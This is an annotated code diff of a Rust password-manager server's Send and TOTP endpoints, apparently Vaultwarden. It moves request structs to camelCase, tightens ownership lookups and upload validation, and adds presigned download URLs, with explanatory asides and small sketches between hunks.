+    let data: SendData = data.into_inner();
    enforce_disable_hide_email_policy(&data, &headers, &mut conn).await?;

-    if data.Type == SendType::File as i32 {
+    if data.r#type == SendType::File as i32 {
         err!("File sends should use /api/sends/file")
     }

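
Aside: several lookups in this file change from find_by_uuid plus a manual ownership check to a combined find_by_uuid_and_user, so a Send owned by someone else is indistinguishable from a missing one. The idea on plain data (SendRow is a stand-in, not the real model):

    struct SendRow {
        uuid: String,
        user_uuid: String,
    }

    fn find_by_uuid_and_user<'a>(rows: &'a [SendRow], uuid: &str, user: &str) -> Option<&'a SendRow> {
        rows.iter().find(|s| s.uuid == uuid && s.user_uuid == user)
    }

    fn main() {
        let rows = vec![SendRow { uuid: "a".into(), user_uuid: "u1".into() }];
        assert!(find_by_uuid_and_user(&rows, "a", "u1").is_some());
        assert!(find_by_uuid_and_user(&rows, "a", "u2").is_none()); // someone else's Send reads as "not found"
    }
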
@@ -185,7 +200,7 @@ async fn post_send(data: JsonUpcase<SendData>, headers: Headers, mut conn: DbCon
         UpdateType::SyncSendCreate,
         &send,
         &send.update_users_revision(&mut conn).await,
-        &headers.device.uuid,
+        &headers.device,
         &mut conn,
     )
     .await;
@@ -195,7 +210,7 @@ async fn post_send(data: JsonUpcase<SendData>, headers: Headers, mut conn: DbCon

 #[derive(FromForm)]
 struct UploadData<'f> {
-    model: Json<crate::util::UpCase<SendData>>,
+    model: Json<SendData>,
     data: TempFile<'f>,
 }

@@ -207,15 +222,17 @@ struct UploadDataV2<'f> {
 // @deprecated Mar 25 2021: This method has been deprecated in favor of direct uploads (v2).
 // This method still exists to support older clients, probably need to remove it sometime.
 // Upstream: https://github.com/bitwarden/server/blob/d0c793c95181dfb1b447eb450f85ba0bfd7ef643/src/Api/Controllers/SendsController.cs#L164-L167
+// 2025: This endpoint doesn't seem to exists anymore in the latest version
+// See: https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Api/Tools/Controllers/SendsController.cs
 #[post("/sends/file", format = "multipart/form-data", data = "<data>")]
 async fn post_send_file(data: Form<UploadData<'_>>, headers: Headers, mut conn: DbConn, nt: Notify<'_>) -> JsonResult {
     enforce_disable_send_policy(&headers, &mut conn).await?;

     let UploadData {
         model,
-        mut data,
+        data,
     } = data.into_inner();
-    let model = model.into_inner().data;
+    let model = model.into_inner();

     let Some(size) = data.len().to_i64() else {
         err!("Invalid send size");
@@ -252,20 +269,15 @@ async fn post_send_file(data: Form<UploadData<'_>>, headers: Headers, mut conn:
         err!("Send content is not a file");
     }

-    let file_id = crate::crypto::generate_send_id();
-    let folder_path = tokio::fs::canonicalize(&CONFIG.sends_folder()).await?.join(&send.uuid);
-    let file_path = folder_path.join(&file_id);
-    tokio::fs::create_dir_all(&folder_path).await?;
+    let file_id = crate::crypto::generate_send_file_id();

-    if let Err(_err) = data.persist_to(&file_path).await {
-        data.move_copy_to(file_path).await?
-    }
+    save_temp_file(PathType::Sends, &format!("{}/{file_id}", send.uuid), data, true).await?;

     let mut data_value: Value = serde_json::from_str(&send.data)?;
     if let Some(o) = data_value.as_object_mut() {
-        o.insert(String::from("Id"), Value::String(file_id));
-        o.insert(String::from("Size"), Value::Number(size.into()));
-        o.insert(String::from("SizeName"), Value::String(crate::util::get_display_size(size)));
+        o.insert(String::from("id"), Value::String(file_id));
+        o.insert(String::from("size"), Value::Number(size.into()));
+        o.insert(String::from("sizeName"), Value::String(crate::util::get_display_size(size)));
     }
     send.data = serde_json::to_string(&data_value)?;

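
Aside: the upload no longer canonicalizes a sends folder and creates directories by hand; it hands the file to a storage helper keyed by an object-store-style relative path ("<send_uuid>/<file_id>"), so local disk and remote backends share one code path. A stand-in sketch (save_file and its values are illustrative, not the real save_temp_file):

    fn save_file(backend: &str, key: &str) {
        // A real implementation would stream the temp file to the chosen backend here.
        println!("persisting to backend '{backend}' under key '{key}'");
    }

    fn main() {
        let send_uuid = "3fa85f64-5717-4562-b3fc-2c963f66afa6"; // example values
        let file_id = "b1946ac92492d2347c6235b4d2611184";
        save_file("sends", &format!("{send_uuid}/{file_id}"));
    }
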
@@ -275,7 +287,7 @@ async fn post_send_file(data: Form<UploadData<'_>>, headers: Headers, mut conn:
         UpdateType::SyncSendCreate,
         &send,
         &send.update_users_revision(&mut conn).await,
-        &headers.device.uuid,
+        &headers.device,
         &mut conn,
     )
     .await;
@@ -283,20 +295,20 @@ async fn post_send_file(data: Form<UploadData<'_>>, headers: Headers, mut conn:
     Ok(Json(send.to_json()))
 }

-// Upstream: https://github.com/bitwarden/server/blob/d0c793c95181dfb1b447eb450f85ba0bfd7ef643/src/Api/Controllers/SendsController.cs#L190
+// Upstream: https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Api/Tools/Controllers/SendsController.cs#L165
 #[post("/sends/file/v2", data = "<data>")]
-async fn post_send_file_v2(data: JsonUpcase<SendData>, headers: Headers, mut conn: DbConn) -> JsonResult {
+async fn post_send_file_v2(data: Json<SendData>, headers: Headers, mut conn: DbConn) -> JsonResult {
     enforce_disable_send_policy(&headers, &mut conn).await?;

-    let data = data.into_inner().data;
+    let data = data.into_inner();

-    if data.Type != SendType::File as i32 {
+    if data.r#type != SendType::File as i32 {
         err!("Send content is not a file");
     }

     enforce_disable_hide_email_policy(&data, &headers, &mut conn).await?;

-    let file_length = match &data.FileLength {
+    let file_length = match &data.file_length {
         Some(m) => m.into_i64()?,
         _ => err!("Invalid send length"),
     };
@@ -327,13 +339,13 @@ async fn post_send_file_v2(data: JsonUpcase<SendData>, headers: Headers, mut con

     let mut send = create_send(data, headers.user.uuid)?;

-    let file_id = crate::crypto::generate_send_id();
+    let file_id = crate::crypto::generate_send_file_id();

     let mut data_value: Value = serde_json::from_str(&send.data)?;
     if let Some(o) = data_value.as_object_mut() {
-        o.insert(String::from("Id"), Value::String(file_id.clone()));
-        o.insert(String::from("Size"), Value::Number(file_length.into()));
-        o.insert(String::from("SizeName"), Value::String(crate::util::get_display_size(file_length)));
+        o.insert(String::from("id"), Value::String(file_id.clone()));
+        o.insert(String::from("size"), Value::Number(file_length.into()));
+        o.insert(String::from("sizeName"), Value::String(crate::util::get_display_size(file_length)));
     }
     send.data = serde_json::to_string(&data_value)?;
     send.save(&mut conn).await?;
@@ -341,16 +353,24 @@ async fn post_send_file_v2(data: JsonUpcase<SendData>, headers: Headers, mut con
     Ok(Json(json!({
         "fileUploadType": 0, // 0 == Direct | 1 == Azure
         "object": "send-fileUpload",
-        "url": format!("/sends/{}/file/{}", send.uuid, file_id),
+        "url": format!("/sends/{}/file/{file_id}", send.uuid),
         "sendResponse": send.to_json()
     })))
 }

-// https://github.com/bitwarden/server/blob/d0c793c95181dfb1b447eb450f85ba0bfd7ef643/src/Api/Controllers/SendsController.cs#L243
-#[post("/sends/<send_uuid>/file/<file_id>", format = "multipart/form-data", data = "<data>")]
+#[derive(Deserialize)]
+#[allow(non_snake_case)]
+pub struct SendFileData {
+    id: SendFileId,
+    size: u64,
+    fileName: String,
+}
+
+// https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Api/Tools/Controllers/SendsController.cs#L195
+#[post("/sends/<send_id>/file/<file_id>", format = "multipart/form-data", data = "<data>")]
 async fn post_send_file_v2_data(
-    send_uuid: &str,
-    file_id: &str,
+    send_id: SendId,
+    file_id: SendFileId,
     data: Form<UploadDataV2<'_>>,
     headers: Headers,
     mut conn: DbConn,
@@ -358,32 +378,58 @@ async fn post_send_file_v2_data(
 ) -> EmptyResult {
     enforce_disable_send_policy(&headers, &mut conn).await?;

-    let mut data = data.into_inner();
+    let data = data.into_inner();

-    let Some(send) = Send::find_by_uuid(send_uuid, &mut conn).await else {
-        err!("Send not found. Unable to save the file.")
+    let Some(send) = Send::find_by_uuid_and_user(&send_id, &headers.user.uuid, &mut conn).await else {
+        err!("Send not found. Unable to save the file.", "Invalid send uuid or does not belong to user.")
     };

-    let Some(send_user_id) = &send.user_uuid else {
-        err!("Sends are only supported for users at the moment")
+    if send.atype != SendType::File as i32 {
+        err!("Send is not a file type send.");
+    }
+
+    let Ok(send_data) = serde_json::from_str::<SendFileData>(&send.data) else {
+        err!("Unable to decode send data as json.")
     };
-    if send_user_id != &headers.user.uuid {
-        err!("Send doesn't belong to user");
+
+    match data.data.raw_name() {
+        Some(raw_file_name)
+            if raw_file_name.dangerous_unsafe_unsanitized_raw() == send_data.fileName
+                // be less strict only if using CLI, cf. https://github.com/dani-garcia/vaultwarden/issues/5614
+                || (headers.device.is_cli() && send_data.fileName.ends_with(raw_file_name.dangerous_unsafe_unsanitized_raw().as_str())
+        ) => {}
+        Some(raw_file_name) => err!(
+            "Send file name does not match.",
+            format!(
+                "Expected file name '{}' got '{}'",
+                send_data.fileName,
+                raw_file_name.dangerous_unsafe_unsanitized_raw()
+            )
+        ),
+        _ => err!("Send file name does not match or is not provided."),
     }

-    let folder_path = tokio::fs::canonicalize(&CONFIG.sends_folder()).await?.join(send_uuid);
-    let file_path = folder_path.join(file_id);
-    tokio::fs::create_dir_all(&folder_path).await?;
-
-    if let Err(_err) = data.data.persist_to(&file_path).await {
-        data.data.move_copy_to(file_path).await?
+    if file_id != send_data.id {
+        err!("Send file does not match send data.", format!("Expected id {} got {file_id}", send_data.id));
     }

+    let Some(size) = data.data.len().to_u64() else {
+        err!("Send file size overflow.");
+    };
+
+    if size != send_data.size {
+        err!("Send file size does not match.", format!("Expected a file size of {} got {size}", send_data.size));
+    }
+
+    let file_path = format!("{send_id}/{file_id}");
+
+    save_temp_file(PathType::Sends, &file_path, data.data, false).await?;
+
     nt.send_send_update(
         UpdateType::SyncSendCreate,
         &send,
         &send.update_users_revision(&mut conn).await,
-        &headers.device.uuid,
+        &headers.device,
         &mut conn,
     )
     .await;
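
Aside: the v2 upload endpoint now cross-checks the multipart part against the metadata recorded when the upload was announced: file name (with a looser suffix match for CLI clients), file id, and exact size. The checks distilled to plain values (SendFileMeta and validate are illustrative stand-ins):

    struct SendFileMeta {
        id: String,
        size: u64,
        file_name: String,
    }

    fn validate(meta: &SendFileMeta, file_id: &str, raw_name: &str, size: u64, is_cli: bool) -> Result<(), String> {
        // CLI clients may send a shortened name, so only a suffix match is required for them.
        let name_ok = raw_name == meta.file_name || (is_cli && meta.file_name.ends_with(raw_name));
        if !name_ok {
            return Err(format!("Expected file name '{}' got '{raw_name}'", meta.file_name));
        }
        if file_id != meta.id {
            return Err(format!("Expected id {} got {file_id}", meta.id));
        }
        if size != meta.size {
            return Err(format!("Expected a file size of {} got {size}", meta.size));
        }
        Ok(())
    }

    fn main() {
        let meta = SendFileMeta { id: "f1".into(), size: 10, file_name: "notes.txt".into() };
        assert!(validate(&meta, "f1", "notes.txt", 10, false).is_ok());
        assert!(validate(&meta, "f1", "notes.txt", 11, false).is_err());
    }
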
@@ -392,22 +438,21 @@ async fn post_send_file_v2_data(
 }

 #[derive(Deserialize)]
-#[allow(non_snake_case)]
+#[serde(rename_all = "camelCase")]
 pub struct SendAccessData {
-    pub Password: Option<String>,
+    pub password: Option<String>,
 }

 #[post("/sends/access/<access_id>", data = "<data>")]
 async fn post_access(
     access_id: &str,
-    data: JsonUpcase<SendAccessData>,
+    data: Json<SendAccessData>,
     mut conn: DbConn,
     ip: ClientIp,
     nt: Notify<'_>,
 ) -> JsonResult {
-    let mut send = match Send::find_by_access_id(access_id, &mut conn).await {
-        Some(s) => s,
-        None => err_code!(SEND_INACCESSIBLE_MSG, 404),
+    let Some(mut send) = Send::find_by_access_id(access_id, &mut conn).await else {
+        err_code!(SEND_INACCESSIBLE_MSG, 404)
     };

     if let Some(max_access_count) = send.max_access_count {
@@ -431,7 +476,7 @@ async fn post_access(
     }

     if send.password_hash.is_some() {
-        match data.into_inner().data.Password {
+        match data.into_inner().password {
             Some(ref p) if send.check_password(p) => { /* Nothing to do here */ }
             Some(_) => err!("Invalid password", format!("IP: {}.", ip.ip)),
             None => err_code!("Password not provided", format!("IP: {}.", ip.ip), 401),
@@ -449,7 +494,7 @@ async fn post_access(
         UpdateType::SyncSendUpdate,
         &send,
         &send.update_users_revision(&mut conn).await,
-        &String::from("00000000-0000-0000-0000-000000000000"),
+        &ANON_PUSH_DEVICE,
         &mut conn,
     )
     .await;
@@ -459,16 +504,15 @@ async fn post_access(

 #[post("/sends/<send_id>/access/file/<file_id>", data = "<data>")]
 async fn post_access_file(
-    send_id: &str,
-    file_id: &str,
-    data: JsonUpcase<SendAccessData>,
+    send_id: SendId,
+    file_id: SendFileId,
+    data: Json<SendAccessData>,
     host: Host,
     mut conn: DbConn,
     nt: Notify<'_>,
 ) -> JsonResult {
-    let mut send = match Send::find_by_uuid(send_id, &mut conn).await {
-        Some(s) => s,
-        None => err_code!(SEND_INACCESSIBLE_MSG, 404),
+    let Some(mut send) = Send::find_by_uuid(&send_id, &mut conn).await else {
+        err_code!(SEND_INACCESSIBLE_MSG, 404)
     };

     if let Some(max_access_count) = send.max_access_count {
@@ -492,7 +536,7 @@ async fn post_access_file(
     }

     if send.password_hash.is_some() {
-        match data.into_inner().data.Password {
+        match data.into_inner().password {
             Some(ref p) if send.check_password(p) => { /* Nothing to do here */ }
             Some(_) => err!("Invalid password."),
             None => err_code!("Password not provided", 401),
@@ -507,22 +551,33 @@ async fn post_access_file(
         UpdateType::SyncSendUpdate,
         &send,
         &send.update_users_revision(&mut conn).await,
-        &String::from("00000000-0000-0000-0000-000000000000"),
+        &ANON_PUSH_DEVICE,
         &mut conn,
     )
     .await;

-    let token_claims = crate::auth::generate_send_claims(send_id, file_id);
-    let token = crate::auth::encode_jwt(&token_claims);
     Ok(Json(json!({
-        "Object": "send-fileDownload",
-        "Id": file_id,
-        "Url": format!("{}/api/sends/{}/{}?t={}", &host.host, send_id, file_id, token)
+        "object": "send-fileDownload",
+        "id": file_id,
+        "url": download_url(&host, &send_id, &file_id).await?,
     })))
 }

+async fn download_url(host: &Host, send_id: &SendId, file_id: &SendFileId) -> Result<String, crate::Error> {
+    let operator = CONFIG.opendal_operator_for_path_type(PathType::Sends)?;
+
+    if operator.info().scheme() == opendal::Scheme::Fs {
+        let token_claims = crate::auth::generate_send_claims(send_id, file_id);
+        let token = crate::auth::encode_jwt(&token_claims);
+
+        Ok(format!("{}/api/sends/{send_id}/{file_id}?t={token}", &host.host))
+    } else {
+        Ok(operator.presign_read(&format!("{send_id}/{file_id}"), Duration::from_secs(5 * 60)).await?.uri().to_string())
+    }
+}

 #[get("/sends/<send_id>/<file_id>?<t>")]
-async fn download_send(send_id: SafeString, file_id: SafeString, t: &str) -> Option<NamedFile> {
+async fn download_send(send_id: SendId, file_id: SendFileId, t: &str) -> Option<NamedFile> {
     if let Ok(claims) = crate::auth::decode_send(t) {
         if claims.sub == format!("{send_id}/{file_id}") {
             return NamedFile::open(Path::new(&CONFIG.sends_folder()).join(send_id).join(file_id)).await.ok();
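
Aside: the new download_url branches on the storage scheme: a filesystem backend keeps the old JWT-gated local route, anything else gets a short-lived presigned URL from the object store. A string-level sketch of that branch (the URLs and token placeholder are illustrative):

    fn download_url(scheme: &str, host: &str, send_id: &str, file_id: &str) -> String {
        if scheme == "fs" {
            // Local storage: the server streams the file itself, gated by a signed token.
            let token = "<jwt-for-send-claims>"; // stands in for encode_jwt(generate_send_claims(..))
            format!("{host}/api/sends/{send_id}/{file_id}?t={token}")
        } else {
            // Remote storage: the client downloads straight from the bucket for a few minutes.
            format!("https://bucket.example/{send_id}/{file_id}?X-Expires=300")
        }
    }

    fn main() {
        println!("{}", download_url("fs", "https://vault.example", "s1", "f1"));
        println!("{}", download_url("s3", "https://vault.example", "s1", "f1"));
    }
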
@@ -531,37 +586,55 @@ async fn download_send(send_id: SafeString, file_id: SafeString, t: &str) -> Opt
     None
 }

-#[put("/sends/<id>", data = "<data>")]
+#[put("/sends/<send_id>", data = "<data>")]
 async fn put_send(
-    id: &str,
-    data: JsonUpcase<SendData>,
+    send_id: SendId,
+    data: Json<SendData>,
     headers: Headers,
     mut conn: DbConn,
     nt: Notify<'_>,
 ) -> JsonResult {
     enforce_disable_send_policy(&headers, &mut conn).await?;

-    let data: SendData = data.into_inner().data;
+    let data: SendData = data.into_inner();
     enforce_disable_hide_email_policy(&data, &headers, &mut conn).await?;

-    let mut send = match Send::find_by_uuid(id, &mut conn).await {
-        Some(s) => s,
-        None => err!("Send not found"),
+    let Some(mut send) = Send::find_by_uuid_and_user(&send_id, &headers.user.uuid, &mut conn).await else {
+        err!("Send not found", "Send send_id is invalid or does not belong to user")
     };

+    update_send_from_data(&mut send, data, &headers, &mut conn, &nt, UpdateType::SyncSendUpdate).await?;
+
+    Ok(Json(send.to_json()))
+}
+
+pub async fn update_send_from_data(
+    send: &mut Send,
+    data: SendData,
+    headers: &Headers,
+    conn: &mut DbConn,
+    nt: &Notify<'_>,
+    ut: UpdateType,
+) -> EmptyResult {
     if send.user_uuid.as_ref() != Some(&headers.user.uuid) {
         err!("Send is not owned by user")
     }

-    if send.atype != data.Type {
+    if send.atype != data.r#type {
         err!("Sends can't change type")
     }

+    if data.deletion_date > Utc::now() + TimeDelta::try_days(31).unwrap() {
+        err!(
+            "You cannot have a Send with a deletion date that far into the future. Adjust the Deletion Date to a value less than 31 days from now and try again."
+        );
+    }
+
     // When updating a file Send, we receive nulls in the File field, as it's immutable,
     // so we only need to update the data field in the Text case
-    if data.Type == SendType::Text as i32 {
-        let data_str = if let Some(mut d) = data.Text {
-            d.as_object_mut().and_then(|d| d.remove("Response"));
+    if data.r#type == SendType::Text as i32 {
+        let data_str = if let Some(mut d) = data.text {
+            d.as_object_mut().and_then(|d| d.remove("response"));
             serde_json::to_string(&d)?
         } else {
             err!("Send data not provided");
@@ -569,58 +642,42 @@ async fn put_send(
|
|||||||
send.data = data_str;
|
send.data = data_str;
|
||||||
}
|
}
|
||||||
|
|
||||||
if data.DeletionDate > Utc::now() + Duration::days(31) {
|
send.name = data.name;
|
||||||
err!(
|
send.akey = data.key;
|
||||||
"You cannot have a Send with a deletion date that far into the future. Adjust the Deletion Date to a value less than 31 days from now and try again."
|
send.deletion_date = data.deletion_date.naive_utc();
|
||||||
);
|
send.notes = data.notes;
|
||||||
}
|
send.max_access_count = match data.max_access_count {
|
||||||
send.name = data.Name;
|
|
||||||
send.akey = data.Key;
|
|
||||||
send.deletion_date = data.DeletionDate.naive_utc();
|
|
||||||
send.notes = data.Notes;
|
|
||||||
send.max_access_count = match data.MaxAccessCount {
|
|
||||||
Some(m) => Some(m.into_i32()?),
|
Some(m) => Some(m.into_i32()?),
|
||||||
_ => None,
|
_ => None,
|
||||||
};
|
};
|
||||||
send.expiration_date = data.ExpirationDate.map(|d| d.naive_utc());
|
send.expiration_date = data.expiration_date.map(|d| d.naive_utc());
|
||||||
send.hide_email = data.HideEmail;
|
send.hide_email = data.hide_email;
|
||||||
send.disabled = data.Disabled;
|
send.disabled = data.disabled;
|
||||||
|
|
||||||
// Only change the value if it's present
|
// Only change the value if it's present
|
||||||
if let Some(password) = data.Password {
|
if let Some(password) = data.password {
|
||||||
send.set_password(Some(&password));
|
send.set_password(Some(&password));
|
||||||
}
|
}
|
||||||
|
|
||||||
send.save(&mut conn).await?;
|
send.save(conn).await?;
|
||||||
nt.send_send_update(
|
if ut != UpdateType::None {
|
||||||
UpdateType::SyncSendUpdate,
|
nt.send_send_update(ut, send, &send.update_users_revision(conn).await, &headers.device, conn).await;
|
||||||
&send,
|
}
|
||||||
&send.update_users_revision(&mut conn).await,
|
Ok(())
|
||||||
&headers.device.uuid,
|
|
||||||
&mut conn,
|
|
||||||
)
|
|
||||||
.await;
|
|
||||||
|
|
||||||
Ok(Json(send.to_json()))
|
|
||||||
}
|
}
|
||||||
|
|
||||||
#[delete("/sends/<id>")]
|
#[delete("/sends/<send_id>")]
|
||||||
async fn delete_send(id: &str, headers: Headers, mut conn: DbConn, nt: Notify<'_>) -> EmptyResult {
|
async fn delete_send(send_id: SendId, headers: Headers, mut conn: DbConn, nt: Notify<'_>) -> EmptyResult {
|
||||||
let send = match Send::find_by_uuid(id, &mut conn).await {
|
let Some(send) = Send::find_by_uuid_and_user(&send_id, &headers.user.uuid, &mut conn).await else {
|
||||||
Some(s) => s,
|
err!("Send not found", "Invalid send uuid, or does not belong to user")
|
||||||
None => err!("Send not found"),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
if send.user_uuid.as_ref() != Some(&headers.user.uuid) {
|
|
||||||
err!("Send is not owned by user")
|
|
||||||
}
|
|
||||||
|
|
||||||
send.delete(&mut conn).await?;
|
send.delete(&mut conn).await?;
|
||||||
nt.send_send_update(
|
nt.send_send_update(
|
||||||
UpdateType::SyncSendDelete,
|
UpdateType::SyncSendDelete,
|
||||||
&send,
|
&send,
|
||||||
&send.update_users_revision(&mut conn).await,
|
&send.update_users_revision(&mut conn).await,
|
||||||
&headers.device.uuid,
|
&headers.device,
|
||||||
&mut conn,
|
&mut conn,
|
||||||
)
|
)
|
||||||
.await;
|
.await;
|
||||||
@@ -628,26 +685,21 @@ async fn delete_send(id: &str, headers: Headers, mut conn: DbConn, nt: Notify<'_
|
|||||||
Ok(())
|
Ok(())
|
||||||
}
|
}
|
||||||
|
|
||||||
#[put("/sends/<id>/remove-password")]
|
#[put("/sends/<send_id>/remove-password")]
|
||||||
async fn put_remove_password(id: &str, headers: Headers, mut conn: DbConn, nt: Notify<'_>) -> JsonResult {
|
async fn put_remove_password(send_id: SendId, headers: Headers, mut conn: DbConn, nt: Notify<'_>) -> JsonResult {
|
||||||
enforce_disable_send_policy(&headers, &mut conn).await?;
|
enforce_disable_send_policy(&headers, &mut conn).await?;
|
||||||
|
|
||||||
let mut send = match Send::find_by_uuid(id, &mut conn).await {
|
let Some(mut send) = Send::find_by_uuid_and_user(&send_id, &headers.user.uuid, &mut conn).await else {
|
||||||
Some(s) => s,
|
err!("Send not found", "Invalid send uuid, or does not belong to user")
|
||||||
None => err!("Send not found"),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
if send.user_uuid.as_ref() != Some(&headers.user.uuid) {
|
|
||||||
err!("Send is not owned by user")
|
|
||||||
}
|
|
||||||
|
|
||||||
send.set_password(None);
|
send.set_password(None);
|
||||||
send.save(&mut conn).await?;
|
send.save(&mut conn).await?;
|
||||||
nt.send_send_update(
|
nt.send_send_update(
|
||||||
UpdateType::SyncSendUpdate,
|
UpdateType::SyncSendUpdate,
|
||||||
&send,
|
&send,
|
||||||
&send.update_users_revision(&mut conn).await,
|
&send.update_users_revision(&mut conn).await,
|
||||||
&headers.device.uuid,
|
&headers.device,
|
||||||
&mut conn,
|
&mut conn,
|
||||||
)
|
)
|
||||||
.await;
|
.await;
|
||||||
|
|||||||
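One pattern recurs throughout these hunks: every `match ... { Some(s) => s, None => err!(...) }` becomes a `let ... else`, which binds on the success path and requires the else block to diverge (here via the early-returning `err!` macro). A standalone illustration, with the function and error text invented for the example:

// `let ... else` is stable since Rust 1.65; the else arm must diverge.
fn first_word(s: &str) -> Result<&str, String> {
    let Some(word) = s.split_whitespace().next() else {
        return Err("empty input".to_string());
    };
    Ok(word)
}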
@@ -3,14 +3,11 @@ use rocket::serde::json::Json;
 use rocket::Route;
 
 use crate::{
-    api::{
-        core::log_user_event, core::two_factor::_generate_recover_code, EmptyResult, JsonResult, JsonUpcase,
-        PasswordOrOtpData,
-    },
+    api::{core::log_user_event, core::two_factor::_generate_recover_code, EmptyResult, JsonResult, PasswordOrOtpData},
     auth::{ClientIp, Headers},
     crypto,
     db::{
-        models::{EventType, TwoFactor, TwoFactorType},
+        models::{EventType, TwoFactor, TwoFactorType, UserId},
         DbConn,
     },
     util::NumberOrString,
@@ -19,12 +16,12 @@ use crate::{
 pub use crate::config::CONFIG;
 
 pub fn routes() -> Vec<Route> {
-    routes![generate_authenticator, activate_authenticator, activate_authenticator_put,]
+    routes![generate_authenticator, activate_authenticator, activate_authenticator_put, disable_authenticator]
 }
 
 #[post("/two-factor/get-authenticator", data = "<data>")]
-async fn generate_authenticator(data: JsonUpcase<PasswordOrOtpData>, headers: Headers, mut conn: DbConn) -> JsonResult {
-    let data: PasswordOrOtpData = data.into_inner().data;
+async fn generate_authenticator(data: Json<PasswordOrOtpData>, headers: Headers, mut conn: DbConn) -> JsonResult {
+    let data: PasswordOrOtpData = data.into_inner();
     let user = headers.user;
 
     data.validate(&user, false, &mut conn).await?;
@@ -37,37 +34,37 @@ async fn generate_authenticator(data: JsonUpcase<PasswordOrOtpData>, headers: He
         _ => (false, crypto::encode_random_bytes::<20>(BASE32)),
     };
 
+    // Upstream seems to also return `userVerificationToken`, but doesn't seem to be used at all.
+    // It should help prevent TOTP disclosure if someone keeps their vault unlocked.
+    // Since it doesn't seem to be used, and also does not cause any issues, lets leave it out of the response.
+    // See: https://github.com/bitwarden/server/blob/9ebe16587175b1c0e9208f84397bb75d0d595510/src/Api/Auth/Controllers/TwoFactorController.cs#L94
     Ok(Json(json!({
-        "Enabled": enabled,
-        "Key": key,
-        "Object": "twoFactorAuthenticator"
+        "enabled": enabled,
+        "key": key,
+        "object": "twoFactorAuthenticator"
     })))
 }
 
-#[derive(Deserialize, Debug)]
-#[allow(non_snake_case)]
+#[derive(Debug, Deserialize)]
+#[serde(rename_all = "camelCase")]
 struct EnableAuthenticatorData {
-    Key: String,
-    Token: NumberOrString,
-    MasterPasswordHash: Option<String>,
-    Otp: Option<String>,
+    key: String,
+    token: NumberOrString,
+    master_password_hash: Option<String>,
+    otp: Option<String>,
 }
 
 #[post("/two-factor/authenticator", data = "<data>")]
-async fn activate_authenticator(
-    data: JsonUpcase<EnableAuthenticatorData>,
-    headers: Headers,
-    mut conn: DbConn,
-) -> JsonResult {
-    let data: EnableAuthenticatorData = data.into_inner().data;
-    let key = data.Key;
-    let token = data.Token.into_string();
+async fn activate_authenticator(data: Json<EnableAuthenticatorData>, headers: Headers, mut conn: DbConn) -> JsonResult {
+    let data: EnableAuthenticatorData = data.into_inner();
+    let key = data.key;
+    let token = data.token.into_string();
 
     let mut user = headers.user;
 
     PasswordOrOtpData {
-        MasterPasswordHash: data.MasterPasswordHash,
-        Otp: data.Otp,
+        master_password_hash: data.master_password_hash,
+        otp: data.otp,
     }
     .validate(&user, true, &mut conn)
     .await?;
@@ -90,23 +87,19 @@ async fn activate_authenticator(
     log_user_event(EventType::UserUpdated2fa as i32, &user.uuid, headers.device.atype, &headers.ip.ip, &mut conn).await;
 
     Ok(Json(json!({
-        "Enabled": true,
-        "Key": key,
-        "Object": "twoFactorAuthenticator"
+        "enabled": true,
+        "key": key,
+        "object": "twoFactorAuthenticator"
     })))
 }
 
 #[put("/two-factor/authenticator", data = "<data>")]
-async fn activate_authenticator_put(
-    data: JsonUpcase<EnableAuthenticatorData>,
-    headers: Headers,
-    conn: DbConn,
-) -> JsonResult {
+async fn activate_authenticator_put(data: Json<EnableAuthenticatorData>, headers: Headers, conn: DbConn) -> JsonResult {
     activate_authenticator(data, headers, conn).await
 }
 
 pub async fn validate_totp_code_str(
-    user_uuid: &str,
+    user_id: &UserId,
     totp_code: &str,
     secret: &str,
     ip: &ClientIp,
@@ -116,11 +109,11 @@ pub async fn validate_totp_code_str(
         err!("TOTP code is not a number");
     }
 
-    validate_totp_code(user_uuid, totp_code, secret, ip, conn).await
+    validate_totp_code(user_id, totp_code, secret, ip, conn).await
 }
 
 pub async fn validate_totp_code(
-    user_uuid: &str,
+    user_id: &UserId,
     totp_code: &str,
     secret: &str,
     ip: &ClientIp,
@@ -128,16 +121,15 @@ pub async fn validate_totp_code(
 ) -> EmptyResult {
     use totp_lite::{totp_custom, Sha1};
 
-    let decoded_secret = match BASE32.decode(secret.as_bytes()) {
-        Ok(s) => s,
-        Err(_) => err!("Invalid TOTP secret"),
+    let Ok(decoded_secret) = BASE32.decode(secret.as_bytes()) else {
+        err!("Invalid TOTP secret")
     };
 
-    let mut twofactor =
-        match TwoFactor::find_by_user_and_type(user_uuid, TwoFactorType::Authenticator as i32, conn).await {
+    let mut twofactor = match TwoFactor::find_by_user_and_type(user_id, TwoFactorType::Authenticator as i32, conn).await
+    {
         Some(tf) => tf,
-        _ => TwoFactor::new(user_uuid.to_string(), TwoFactorType::Authenticator, secret.to_string()),
+        _ => TwoFactor::new(user_id.clone(), TwoFactorType::Authenticator, secret.to_string()),
     };
 
     // The amount of steps back and forward in time
     // Also check if we need to disable time drifted TOTP codes.
@@ -156,20 +148,20 @@ pub async fn validate_totp_code(
         let time = (current_timestamp + step * 30i64) as u64;
         let generated = totp_custom::<Sha1>(30, 6, &decoded_secret, time);
 
-        // Check the the given code equals the generated and if the time_step is larger then the one last used.
-        if generated == totp_code && time_step > i64::from(twofactor.last_used) {
+        // Check the given code equals the generated and if the time_step is larger then the one last used.
+        if generated == totp_code && time_step > twofactor.last_used {
             // If the step does not equals 0 the time is drifted either server or client side.
             if step != 0 {
-                warn!("TOTP Time drift detected. The step offset is {}", step);
+                warn!("TOTP Time drift detected. The step offset is {step}");
             }
 
             // Save the last used time step so only totp time steps higher then this one are allowed.
             // This will also save a newly created twofactor if the code is correct.
-            twofactor.last_used = time_step as i32;
+            twofactor.last_used = time_step;
             twofactor.save(conn).await?;
             return Ok(());
-        } else if generated == totp_code && time_step <= i64::from(twofactor.last_used) {
-            warn!("This TOTP or a TOTP code within {} steps back or forward has already been used!", steps);
+        } else if generated == totp_code && time_step <= twofactor.last_used {
+            warn!("This TOTP or a TOTP code within {steps} steps back or forward has already been used!");
             err!(
                 format!("Invalid TOTP code! Server time: {} IP: {}", current_time.format("%F %T UTC"), ip.ip),
                 ErrorEvent {
@@ -187,3 +179,47 @@ pub async fn validate_totp_code(
         }
     );
 }
+
+#[derive(Debug, Deserialize)]
+#[serde(rename_all = "camelCase")]
+struct DisableAuthenticatorData {
